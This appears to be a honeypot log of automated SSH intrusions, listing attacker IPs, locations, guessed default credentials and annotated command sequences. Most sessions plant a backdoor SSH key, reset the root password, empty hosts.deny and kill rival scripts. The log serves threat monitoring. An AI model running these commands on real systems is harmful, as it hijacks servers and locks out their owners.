$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:JGVMI6WzKd5m"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_23 (52.224.109.126) β€” Boydton, United States Β· 2 sessions Β· 38 cmds
2026-06-01 11:42 EDT Β· as root/Root123, root/packer
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:0LQivEaWT5e5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:KsEBIfaQGazN"|chpasswd|bash
🎭 autobahn_root_11 (64.188.119.33) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 38 cmds
2026-06-01 11:43 EDT Β· as root/Root123, root/packer
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:x626tUSVLGmg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:5I9huIGvcGlB"|chpasswd|bash
🎭 rogue_root_41 (189.147.19.238) β€” Benito Juarez, Mexico Β· 6 sessions Β· 114 cmds
2026-05-16 22:31 EDT Β· as root/Root123, root/cmb, root/control
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo "root:97fqaftN3LDh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—6 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo "root:f22nq2PjNBg4"|chpasswd|bash
$ echo "root:dunOCIugCZOx"|chpasswd|bash
$ echo "root:9IoSRpVJBIYr"|chpasswd|bash
$ echo "root:GgJVsRaYoD7s"|chpasswd|bash
$ echo "root:BgVkVw9CgRXW"|chpasswd|bash
🎭 moose_root_2 (167.114.115.77) β€” Montreal, Canada Β· 1 session Β· 19 cmds
2026-06-01 10:19 EDT Β· as root/123456Abc
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:MI6hAsbaL3tQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_37 (85.105.140.125) β€” Urla, Turkey Β· 1 session Β· 20 cmds
2026-06-01 10:17 EDT Β· as user1/1111
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1111\ncOI2rEndbwXz\ncOI2rEndbwXz"|passwd|bash
$ Enter new UNIX password:
$ echo "1111\ncOI2rEndbwXz\ncOI2rEndbwXz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_2 (1.14.180.163) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-01 10:06 EDT Β· as malik/malik123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "malik123\nsBYG2NCvzRWu\nsBYG2NCvzRWu"|passwd|bash
$ Enter new UNIX password:
$ echo "malik123\nsBYG2NCvzRWu\nsBYG2NCvzRWu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_42 (203.113.174.95) β€” Hanoi, Vietnam Β· 4 sessions Β· 77 cmds
2026-05-31 00:57 EDT Β· as foundry/123, root/1234QWERasdf, root/Password123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:EbyBOemPz4ic"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:m1RXCjC6O7j8"|chpasswd|bash
$ echo -e "123\n6PX5rtwd7vW2\n6PX5rtwd7vW2"|passwd|bash
$ Enter new UNIX password:
$ echo "123\n6PX5rtwd7vW2\n6PX5rtwd7vW2\n"|passwd
$ echo "root:GT6bTxeSBolz"|chpasswd|bash
🎭 cowboy_root_25 (138.113.22.151) β€” Ashburn, United States Β· 2 sessions Β· 38 cmds
2026-06-01 07:42 EDT Β· as root/Password123, root/qwe1314520
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:5uhzkA3cVWPG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:JeFDjPGiBc9q"|chpasswd|bash
🎭 wraith_root_41 (185.227.153.56) β€” Tsuen Wan, Hong Kong Β· 2 sessions Β· 38 cmds
2026-06-01 07:44 EDT Β· as root/Password123, root/qwe1314520
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:GBO25AlqpQpL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:c2sfnMGXjpGt"|chpasswd|bash
🎭 lantern_root_15 (111.53.147.80) β€” Liuxiang, China Β· 2 sessions Β· 38 cmds
2026-06-01 07:42 EDT Β· as root/Password123, root/qwe1314520
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:pL3MVaEkbjkQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Q9OlG4YyW7r2"|chpasswd|bash
🎭 cipher_root_39 (82.197.58.130) β€” Riyadh, Saudi Arabia Β· 1 session Β· 20 cmds
2026-06-01 06:55 EDT Β· as ubuntu/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "root\nKEcjqV1rEXOL\nKEcjqV1rEXOL"|passwd|bash
$ Enter new UNIX password:
$ echo "root\nKEcjqV1rEXOL\nKEcjqV1rEXOL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_19 (18.144.3.82) β€” San Jose, United States Β· 1 session Β· 19 cmds
2026-06-01 06:53 EDT Β· as root/Qwert12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:SF92kH7EIpS7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 clog_root (45.153.34.71) β€” Eygelshoven, Netherlands Β· 6 sessions Β· 6 cmds
2026-06-01 03:18 EDT Β· as admin/admin, deployer/dev, ftp/ftp
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—6
🎭 specter_root_43 (68.183.178.130) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-01 03:01 EDT Β· as guest/123
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
